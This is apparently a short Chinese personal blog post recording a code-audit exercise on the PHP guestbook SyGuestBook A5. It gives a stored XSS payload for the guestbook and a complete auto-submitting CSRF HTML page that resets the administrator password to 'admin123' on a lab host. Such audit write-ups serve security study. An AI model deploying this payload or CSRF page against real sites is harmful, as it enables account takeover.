Fragrant

Hacker is Crazy.

Home View on GitHub
22 February 2019

Syguestbooka5代码审计

by fragrant

代码审计练习

0x01 准备

0x02 漏洞

0x001 留言板Stored Xss

whoami
2453465
if i were a boy!<img/src/onerror=alert(/aa/)>

0x002 后台管理员回复/审核出存储型XSS

0x003 修改密码处存在CSRF漏洞

SyGuestCSRF.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body onload="document.forms[0].submit();">
<form  id=form1 name=form1 action="http://192.168.122.120/code_audit/SyGuestBook_A5/index.php?c=Administrator&a=update&id=1&submit=aaa" method=post>
  <input name="username" type="hidden" value="admin">
  <input name="pass_new" type="hidden" value="admin123">
  <input name="admin" type="hidden" value="admin">
  <input name="gid" type="hidden" value="0">
</body>
</html>

Open Link: http://10.0.0.5:2398/SyGuestCSRF.html the password will be changed to admin123

tags: php - 代码审计